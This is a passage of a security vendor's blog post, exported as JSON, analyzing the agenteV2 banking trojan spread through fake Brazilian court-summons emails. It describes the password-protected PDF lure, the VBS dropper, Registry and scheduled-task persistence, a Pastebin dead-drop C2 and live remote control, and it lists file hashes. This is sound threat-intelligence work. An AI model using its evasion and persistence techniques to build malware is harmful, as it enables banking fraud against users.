{"id":20342,"date":"2026-04-24T11:02:39","date_gmt":"2026-04-24T11:02:39","guid":{"rendered":"https:\/\/any.run\/cybersecurity-blog\/?p=20342"},"modified":"2026-04-24T13:18:55","modified_gmt":"2026-04-24T13:18:55","slug":"brazilian-banking-phishing-campaign","status":"publish","type":"post","link":"https:\/\/any.run\/cybersecurity-blog\/brazilian-banking-phishing-campaign\/","title":{"rendered":"Inside\u00a0agenteV2: How Brazilian Attackers Use Fake Court Summons to Steal Banking Credentials in Real Time\u00a0"},"content":{"rendered":"\n<p><em><strong>Editor\u2019s note:<\/strong><\/em><em style=\"\"><b>&nbsp;The analysis is authored by Moises Cerqueira, <\/b><\/em><strong><em>malware researcher &amp; threat hunter. You can&nbsp;find Moises on <a href=\"https:\/\/www.linkedin.com\/in\/moises-cerqueira\/\">LinkedIn<\/a> and <a href=\"https:\/\/x.com\/0x_Olympus\">X<\/a>.<\/em><\/strong><\/p>\n\n\n\n<p>A new phishing campaign targeting Brazilian users&nbsp;demonstrates&nbsp;how modern financial malware has evolved from simple credential theft into full-scale, operator-driven fraud platforms. Disguised as a judicial summons,&nbsp;this campaign leverages social engineering, multi-stage malware delivery, and real-time remote access capabilities&nbsp;<strong>to compromise victims and actively&nbsp;assist&nbsp;attackers in financial theft.&nbsp;<\/strong>&nbsp;<\/p>\n\n\n\n<p>For organizations, the implications extend beyond individual users.&nbsp;<strong>Employees accessing corporate systems, financial platforms, or crypto wallets from infected endpoints can unintentionally expose business-critical assets<\/strong>. The malware\u2019s ability to stream&nbsp;screens,&nbsp;execute commands, and harvest credentials in real time makes it particularly dangerous for finance teams, executives, and organizations&nbsp;operating&nbsp;in or with Brazil.&nbsp;<\/p>\n\n\n\n<p>This is not just phishing.&nbsp;It\u2019s&nbsp;a live intrusion channel into financial workflows.&nbsp;Technical analysis&nbsp;below.&nbsp;&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Attack Overview&nbsp;<\/h2>\n\n\n\n<p>The malware at the heart of this campaign, agenteV2, functions as a full interactive backdoor. Once installed,&nbsp;<strong>it streams the&nbsp;victim&#8217;s&nbsp;screen to the attacker in real time, enabling live, operator-assisted financial fraud<\/strong>. A human operator watches the victim&#8217;s desktop session as it happens, waiting for a banking portal to open, and then takes direct control.&nbsp;<\/p>\n\n\n\n<p>The malware targets credentials and sessions at seven&nbsp;<strong>major Brazilian financial institutions<\/strong>&nbsp;\u2014 Ita\u00fa, Banco do&nbsp;Brasil, Caixa Econ\u00f4mica Federal, Bradesco, Santander, Inter, and Stone \u2014 as well as&nbsp;<strong>five major cryptocurrency wallet extensions<\/strong>. It also probes host systems for the presence of specialized Brazilian anti-fraud software (Diebold Warsaw,&nbsp;GbPlugin),&nbsp;indicating&nbsp;deliberate, well-researched targeting of the Brazilian financial ecosystem.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Executive Summary&nbsp;<\/h2>\n\n\n\n<p><strong>1. This Is Live Financial Fraud, Not Passive Credential Theft.<\/strong>&nbsp;<\/p>\n\n\n\n<p><strong>Business perspective<\/strong>: agenteV2 establishes a persistent WebSocket backdoor with live screen streaming and a remote shell. The attacker watches the victim&#8217;s screen in real time and acts manually the moment a banking session opens. Financial losses can occur within minutes of&nbsp;infection,&nbsp;before&nbsp;any traditional alert fires.&nbsp;<\/p>\n\n\n\n<p>Deploy ANY.RUN\u00a0<a href=\"https:\/\/any.run\/features\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=brazilian-banking-phishing-campaign&amp;utm_term=240426&amp;utm_content=linktosandboxlanding\" target=\"_blank\" rel=\"noreferrer noopener\">Interactive Sandbox<\/a>\u00a0to detonate suspicious email attachments in a live, controlled environment before they reach employee inboxes.\u00a0<\/p>\n\n\n\n<p><strong>2.&nbsp;The Lure Is Convincing Enough to Fool Security-Aware Staff.<\/strong>&nbsp;<\/p>\n\n\n\n<p><strong>Business perspective:<\/strong>&nbsp;The phishing email impersonates a Brazilian federal court using a case number format indistinguishable from authentic CNJ court references. Even employees trained to spot phishing are likely to treat a realistic judicial summons as a high-priority&nbsp;communication requiring immediate action.&nbsp;<\/p>\n\n\n\n<p>Use ANY.RUN&nbsp;<a href=\"https:\/\/any.run\/threat-intelligence-lookup\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=brazilian-banking-phishing-campaign&amp;utm_term=240426&amp;utm_content=linktotilookuplanding\" target=\"_blank\" rel=\"noreferrer noopener\">Threat&nbsp;Intelligence&nbsp;Lookup<\/a>&nbsp;to check suspicious email sender domains, embedded URLs, and attachment hashes instantly against a continuously updated threat intelligence database. A 10-second lookup is sufficient to surface this&nbsp;campaign&#8217;s&nbsp;known indicators.&nbsp;<\/p>\n\n\n\n<p><strong>3.&nbsp;The Malware&nbsp;Survives Reboots, IT Maintenance, and Password Resets.<\/strong>&nbsp;<\/p>\n\n\n\n<p><strong>Business perspective<\/strong>: Three separate persistence mechanisms \u2014 two Scheduled Tasks at maximum privilege and a Registry Run key \u2014 ensure the malware&nbsp;remains&nbsp;operational across reboots, routine IT maintenance, and even password changes.&nbsp;&nbsp;<\/p>\n\n\n\n<p>ANY.RUN&nbsp;<a href=\"https:\/\/any.run\/threat-intelligence-feeds\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=brazilian-banking-phishing-campaign&amp;utm_term=240426&amp;utm_content=linktotifeedslanding\" target=\"_blank\" rel=\"noreferrer noopener\">Threat Intelligence&nbsp;Feeds<\/a>&nbsp;deliver structured IOCs&nbsp;directly into your SIEM and EDR for automated hunting across your entire endpoint fleet. Any host matching these indicators should be treated as actively compromised and isolated&nbsp;immediately.&nbsp;<\/p>\n\n\n\n<p><strong>4. Blocking the Known C2 IP Is Not Enough.<\/strong>&nbsp;<\/p>\n\n\n\n<p><strong>Business perspective:<\/strong>&nbsp;The malware reads its command-and-control server address from a public Pastebin page. The attacker can silently rotate to a new IP by editing a single page \u2014 without redeploying, recompiling, or redelivering any malware. IP blocklists become stale within hours of a C2 rotation.&nbsp;<\/p>\n\n\n\n<p>Replace IP-based blocking with behavior-based detection. The agenteV2 TLS client fingerprint (JA3&nbsp;hash))&nbsp;is stable across infrastructure rotations and can be deployed as a detection rule in your IDS\/NDR\/EDR.&nbsp;<\/p>\n\n\n\n<p><strong>5.&nbsp;Traditional AV Will Not Catch This:&nbsp;Behavioral Analysis Is Required.<\/strong>&nbsp;<\/p>\n\n\n\n<p><strong>Business perspective:&nbsp;<\/strong>The core stealer DLL is compiled from Python to native machine code with&nbsp;Nuitka&nbsp;\u2014 no bytecode is&nbsp;extractable&nbsp;and standard&nbsp;decompilers&nbsp;do not apply. Files are disguised with legitimate names (wifi_driver.exe, msedge04.exe) and the payload executes entirely in memory before touching&nbsp;disk.&nbsp;&nbsp;<\/p>\n\n\n\n<p>Behavioral sandbox analysis is the only reliable pre-execution detection method for&nbsp;Nuitka-compiled threats. The YARA rule in this report (Win_Stealer_AgenteV2_Nuitka) is deployable via&nbsp;<a href=\"https:\/\/any.run\/enterprise\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=brazilian-banking-phishing-campaign&amp;utm_term=240426&amp;utm_content=linktoenterprise\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN TI infrastructure<\/a>&nbsp;for automated variant detection.&nbsp;<\/p>\n\n\n\n<div class=\"wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper\n\"\n    >\n        <table id=\"wpdtSimpleTable-291\"\n           style=\"border-collapse:collapse;\n                   border-spacing:0px;\"\n           class=\"wpdtSimpleTable wpDataTable\"\n           data-column=\"2\"\n           data-rows=\"8\"\n           data-wpID=\"291\"\n           data-responsive=\"0\"\n           data-has-header=\"1\">\n\n                    <thead>        <tr class=\"wpdt-cell-row \" >\n                                <th class=\"wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014 wpdt-valign-middle wpdt-align-center\"\n                                            data-cell-id=\"A1\"\n                    data-col-index=\"0\"\n                    data-row-index=\"0\"\n                    style=\" width:22.337278106509%;                    padding:10px;\n                    \"\n                    >\n                                        Impact Area\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014 wpdt-valign-middle wpdt-align-center\"\n                                            data-cell-id=\"B1\"\n                    data-col-index=\"1\"\n                    data-row-index=\"0\"\n                    style=\" width:77.662721893491%;                    padding:10px;\n                    \"\n                    >\n                                        Assessment\u00a0                    <\/th>\n                                        <\/tr>\n                    <tbody>        <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-bold wpdt-fs-000012 wpdt-align-left wpdt-valign-middle\"\n                                            data-cell-id=\"A2\"\n                    data-col-index=\"0\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Financial Impact\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left wpdt-valign-middle\"\n                                            data-cell-id=\"B2\"\n                    data-col-index=\"1\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Real-time operator-assisted fraud + credential theft targeting major Brazilian banks and crypto wallets\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-bold wpdt-fs-000012 wpdt-align-left wpdt-valign-middle\"\n                                            data-cell-id=\"A3\"\n                    data-col-index=\"0\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Scope\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left wpdt-valign-middle\"\n                                            data-cell-id=\"B3\"\n                    data-col-index=\"1\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Brazilian users judicial lure suggests broad targeting, not\u00a0spearphishing\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-bold wpdt-fs-000012 wpdt-align-left wpdt-valign-middle\"\n                                            data-cell-id=\"A4\"\n                    data-col-index=\"0\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Persistence\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left wpdt-valign-middle\"\n                                            data-cell-id=\"B4\"\n                    data-col-index=\"1\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Triple persistence (Registry Run + two Scheduled Tasks \/rl\u00a0highest)\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-bold wpdt-fs-000012 wpdt-align-left wpdt-valign-middle\"\n                                            data-cell-id=\"A5\"\n                    data-col-index=\"0\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        C2 Resilience\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left wpdt-valign-middle\"\n                                            data-cell-id=\"B5\"\n                    data-col-index=\"1\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Pastebin dead-drop resolver enables rapid IP rotation without redeployment\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-bold wpdt-fs-000012 wpdt-align-left wpdt-valign-middle\"\n                                            data-cell-id=\"A6\"\n                    data-col-index=\"0\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Detection Difficulty\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left wpdt-valign-middle\"\n                                            data-cell-id=\"B6\"\n                    data-col-index=\"1\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Nuitka-compiled DLL, Cloudflare proxy, legitimate-looking filenames, WebSocket C2 channel\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-bold wpdt-fs-000012 wpdt-align-left wpdt-valign-middle\"\n                                            data-cell-id=\"A7\"\n                    data-col-index=\"0\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        RE Difficulty\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left wpdt-valign-middle\"\n                                            data-cell-id=\"B7\"\n                    data-col-index=\"1\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Core DLL compiled to native code (Nuitka); no extractable bytecode; ~90%\u00a0Nuitka\u00a0boilerplate\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-bold wpdt-fs-000012 wpdt-align-left wpdt-valign-middle\"\n                                            data-cell-id=\"A8\"\n                    data-col-index=\"0\"\n                    data-row-index=\"7\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Threat Classification\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left wpdt-valign-middle\"\n                                            data-cell-id=\"B8\"\n                    data-col-index=\"1\"\n                    data-row-index=\"7\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Interactive Banking Trojan + Infostealer persistent WebSocket backdoor with live screen streaming and remote shell\u00a0                    <\/td>\n                                        <\/tr>\n                    <\/table>\n<\/div><style id='wpdt-custom-style-291'>\ntable#wpdtSimpleTable-291{ table-layout: fixed !important; }\ntable#wpdtSimpleTable-291 td, table.wpdtSimpleTable291 th { white-space: normal !important; }\n.wpdt-bc-03A9F4 { background-color: #03A9F4 !important;}\n.wpdt-fs-000014 { font-size: 14px !important;}\n.wpdt-fs-000012 { font-size: 12px !important;}\n<\/style>\n\n\n\n\n<br>\n\n\n\n<!-- Regular Banner START -->\n<div class=\"regular-banner\">\n<!-- Text Content -->\n<p class=\"regular-banner__text\">\nMake faster security decisions with live threat context.<br>\n<span class=\"highlight\">Prevent financial loss and business disruption.<br><\/span><\/p>\n<!-- CTA Link -->\n<a class=\"regular-banner__link\" id=\"article-banner-regular\" href=\"https:\/\/any.run\/enterprise\/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=brazilian-banking-phishing-campaign&#038;utm_term=240426&#038;utm_content=linktoenterprise#contact-sales\" rel=\"noopener\" target=\"_blank\">\nContact us\n<\/a>\n<\/div>\n<!-- Regular Banner END -->\n<!-- Regular Banner Styles START -->\n\n<style>\n.regular-banner {\ndisplay: flex;\ntext-align: center;\nflex-direction: column;\nalign-items: center;\ngap: 1.5rem;\nwidth: 100%;\npadding: 2rem;\nmargin: 1.5rem 0;\nborder-radius: 0.5rem;\nfont-family: 'Catamaran Bold';\nmargin-inline: auto;\nbackground: rgba(32, 168, 241, 0.1);\nborder: 1px solid rgba(75, 174, 227, 0.32);\n}\n\n.regular-banner__text {\nfont-size: 1.5rem;\nmargin: 0;\n}\n\n.highlight {\ncolor: #ea2526;\n}\n\n.regular-banner__link {\npadding: 0.5rem 1.5rem;\nfont-weight: 500;\ntext-decoration: none;\nborder-radius: 0.5rem;\ncolor: #FFFFFF;\nbackground-color: #1491D4;\ntext-align: center;\ntransition: all 0.2s ease-in;\n}\n\n.regular-banner__link:hover {\nbackground-color: #68CBFF;\ncolor: white;\n}\n<\/style>\n<!-- Regular Banner Styles END -->\n\n\n\n<h2 class=\"wp-block-heading\">Detailed Technical Analysis&nbsp;<\/h2>\n\n\n\n<p>This attack was fully analyzed in ANY.RUN&#8217;s Interactive Sandbox, which provided full visibility into the multi-stage infection chain, process trees, network connections, API traces, and registry modifications in a live, controllable Windows 11 environment.&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/app.any.run\/tasks\/15fe8dd6-3ae1-4b34-aec4-2540570c6d4a\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=brazilian-banking-phishing-campaign&amp;utm_term=240426&amp;utm_content=linktoservice\" target=\"_blank\" rel=\"noreferrer noopener\">View&nbsp;the phishing analysis session<\/a>&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"578\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_0-1024x578.png\" alt=\"\" class=\"wp-image-20362\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_0-1024x578.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_0-300x169.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_0-768x433.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_0-1536x867.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_0-370x209.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_0-270x152.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_0-740x418.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_0.png 1850w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Full&nbsp;attack&nbsp;chain&nbsp;analysis&nbsp;in&nbsp;the&nbsp;sandbox<\/em><\/figcaption><\/figure>\n\n\n\n<p>The threat actor&nbsp;operates&nbsp;a well-structured infrastructure spanning phishing delivery, staged payload distribution, a Pastebin-based dead-drop resolver, and a dedicated C2 server hosted on a bulletproof VPS provider in Germany.&nbsp;<\/p>\n\n\n\n<p>The final payload, internally named agenteV2, is a Python-based interactive Banking&nbsp;<a href=\"https:\/\/any.run\/malware-trends\/trojan\/\" target=\"_blank\" rel=\"noreferrer noopener\">Trojan&nbsp;<\/a>and Information&nbsp;<a href=\"https:\/\/any.run\/malware-trends\/stealer\/\" target=\"_blank\" rel=\"noreferrer noopener\">Stealer<\/a>&nbsp;whose core logic (agenteV2_historico_detect.dll) is compiled with&nbsp;Nuitka&nbsp;into native machine code.&nbsp;&nbsp;<\/p>\n\n\n\n<!-- Regular Banner START -->\n<div class=\"regular-banner\">\n<!-- Text Content -->\n<p class=\"regular-banner__text\">\nClose blind spots and <span class=\"highlight\">reduce breach risks in your company<\/span>.<br>\nIntegrate ANY.RUN\u2019s sandbox for early threat detection.<br><\/p>\n<!-- CTA Link -->\n<a class=\"regular-banner__link\" id=\"article-banner-regular\" href=\"https:\/\/app.any.run\/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=brazilian-banking-phishing-campaign&#038;utm_term=240426&#038;utm_content=linktoregistration#register\" rel=\"noopener\" target=\"_blank\">\nRegister now\n<\/a>\n<\/div>\n<!-- Regular Banner END -->\n<!-- Regular Banner Styles START -->\n\n<style>\n.regular-banner {\ndisplay: flex;\ntext-align: center;\nflex-direction: column;\nalign-items: center;\ngap: 1.5rem;\nwidth: 100%;\npadding: 2rem;\nmargin: 1.5rem 0;\nborder-radius: 0.5rem;\nfont-family: 'Catamaran Bold';\nmargin-inline: auto;\nbackground: rgba(32, 168, 241, 0.1);\nborder: 1px solid rgba(75, 174, 227, 0.32);\n}\n\n.regular-banner__text {\nfont-size: 1.5rem;\nmargin: 0;\n}\n\n.highlight {\ncolor: #ea2526;\n}\n\n.regular-banner__link {\npadding: 0.5rem 1.5rem;\nfont-weight: 500;\ntext-decoration: none;\nborder-radius: 0.5rem;\ncolor: #FFFFFF;\nbackground-color: #1491D4;\ntext-align: center;\ntransition: all 0.2s ease-in;\n}\n\n.regular-banner__link:hover {\nbackground-color: #68CBFF;\ncolor: white;\n}\n<\/style>\n<!-- Regular Banner Styles END -->\n\n\n\n<p>It is not a passive fire-and-forget stealer \u2014 it&nbsp;establishes&nbsp;a persistent WebSocket backdoor (uws:\/\/) enabling live screen streaming (PIL +&nbsp;mss), an interactive remote shell (subprocess.Popen&nbsp;dispatched via&nbsp;CMD:SHELL: parsing), and real-time operator control over the victim session. Persistence is achieved via Registry Run key and Scheduled Tasks (\/rl&nbsp;highest), and a Pastebin dead-drop resolver enables rapid C2 rotation without redeployment.&nbsp;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">1.&nbsp;Initial Artifact Analysis&nbsp;<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\"><em>1.1&nbsp;Email lure (.eml)<\/em>&nbsp;<\/h4>\n\n\n\n<p>The campaign is delivered via email impersonating an official judicial summons from the Tribunal de Justi\u00e7a do Distrito Federal (TJDF), referencing a fabricated civil conciliation hearing (case number 2194839-33.2026.8.07.1876). The case number format matches the authentic Brazilian CNJ numbering standard, increasing credibility.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"648\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_1-1024x648.png\" alt=\"\" class=\"wp-image-20368\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_1-1024x648.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_1-300x190.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_1-768x486.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_1-370x234.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_1-270x171.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_1-740x468.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_1.png 1463w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Phishing&nbsp;email: PDF&nbsp;with&nbsp;password&nbsp;prompt&nbsp;and&nbsp;fake&nbsp;error&nbsp;message&nbsp;with&nbsp;download&nbsp;link&nbsp;for&nbsp;VBS<\/em><\/figcaption><\/figure>\n\n\n\n<div class=\"wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper\n\"\n    >\n        <table id=\"wpdtSimpleTable-292\"\n           style=\"border-collapse:collapse;\n                   border-spacing:0px;\"\n           class=\"wpdtSimpleTable wpDataTable\"\n           data-column=\"2\"\n           data-rows=\"8\"\n           data-wpID=\"292\"\n           data-responsive=\"0\"\n           data-has-header=\"1\">\n\n                    <thead>        <tr class=\"wpdt-cell-row \" >\n                                <th class=\"wpdt-cell wpdt-bc-03A9F4 wpdt-bold wpdt-fs-000015\"\n                                            data-cell-id=\"A1\"\n                    data-col-index=\"0\"\n                    data-row-index=\"0\"\n                    style=\" width:16.834532374101%;                    padding:10px;\n                    \"\n                    >\n                                        Property\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bc-03A9F4 wpdt-bold wpdt-fs-000015\"\n                                            data-cell-id=\"B1\"\n                    data-col-index=\"1\"\n                    data-row-index=\"0\"\n                    style=\" width:83.165467625899%;                    padding:10px;\n                    \"\n                    >\n                                        Value\u00a0                    <\/th>\n                                        <\/tr>\n                    <tbody>        <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-bold wpdt-fs-000012\"\n                                            data-cell-id=\"A2\"\n                    data-col-index=\"0\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Filename\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B2\"\n                    data-col-index=\"1\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        INTIMACAO JUDICIAL -\u00a0Designacao\u00a0de\u00a0Conciliacao\u00a0-\u00a0Diegovolt\u00a0- 2194839-33.2026.8.07.1876.eml\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-bold wpdt-fs-000012\"\n                                            data-cell-id=\"A3\"\n                    data-col-index=\"0\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        MIME Type\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B3\"\n                    data-col-index=\"1\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        message\/rfc822 (SMTP\u00a0mail, ASCII\u00a0text, CRLF\u00a0line\u00a0terminators)\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-bold wpdt-fs-000012\"\n                                            data-cell-id=\"A4\"\n                    data-col-index=\"0\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        MD5\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B4\"\n                    data-col-index=\"1\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        285fea57345d838916153c4d8f43ab6c\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-bold wpdt-fs-000012\"\n                                            data-cell-id=\"A5\"\n                    data-col-index=\"0\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        SHA1\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B5\"\n                    data-col-index=\"1\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        8a87d63110eeb782bb621b5f3154ca80bdcf5de7\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-bold wpdt-fs-000012\"\n                                            data-cell-id=\"A6\"\n                    data-col-index=\"0\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        SHA256\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B6\"\n                    data-col-index=\"1\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        5fd682cdfdf2de867be2a4bd378a2c206370c18a598975a11c99dba121e36b1b\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-bold wpdt-fs-000012\"\n                                            data-cell-id=\"A7\"\n                    data-col-index=\"0\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        ssdeep\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B7\"\n                    data-col-index=\"1\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        768:1wxIS5yHtOJ3GsP80Nbt0m0mxGQd5fiCJxXFAwYNBYT:KkHtbo5+mxbnVr\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-bold wpdt-fs-000012\"\n                                            data-cell-id=\"A8\"\n                    data-col-index=\"0\"\n                    data-row-index=\"7\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        ANY.RUN\u00a0Tags\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B8\"\n                    data-col-index=\"1\"\n                    data-row-index=\"7\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        attachments,\u00a0attc-pdf,\u00a0blind-copy,\u00a0pastebin,\u00a0python,\u00a0nuitka,\u00a0loader\u00a0                    <\/td>\n                                        <\/tr>\n                    <\/table>\n<\/div><style id='wpdt-custom-style-292'>\ntable#wpdtSimpleTable-292{ table-layout: fixed !important; }\ntable#wpdtSimpleTable-292 td, table.wpdtSimpleTable292 th { white-space: normal !important; }\n.wpdt-bc-03A9F4 { background-color: #03A9F4 !important;}\n.wpdt-fs-000015 { font-size: 15px !important;}\n.wpdt-fs-000012 { font-size: 12px !important;}\n<\/style>\n\n\n\n\n<h4 class=\"wp-block-heading\"><em>1.2 Social Engineering Mechanism<\/em>&nbsp;<\/h4>\n\n\n\n<p>The PDF attachment requires a password to open a technique to bypass email gateway sandboxes that cannot interact with password-protected documents. Upon &#8216;failing&#8217; to open, the PDF instructs the victim to download a VBS file via a &#8216;click here&#8217; link, attributing the error to a missing software&nbsp;component. This two-step friction is deliberate: it filters unengaged recipients and increases commitment of those who&nbsp;proceed.&nbsp;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">2.&nbsp;Infection&nbsp;Chain&nbsp;<\/h3>\n\n\n\n<p>The full process tree&nbsp;and&nbsp;infection chain graph&nbsp;are visible in the sandbox detonation: WScript.exe \u2192 cmd.exe \u2192&nbsp;schtasks&nbsp;+ wifi_driver.exe execution flow:&nbsp;&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" 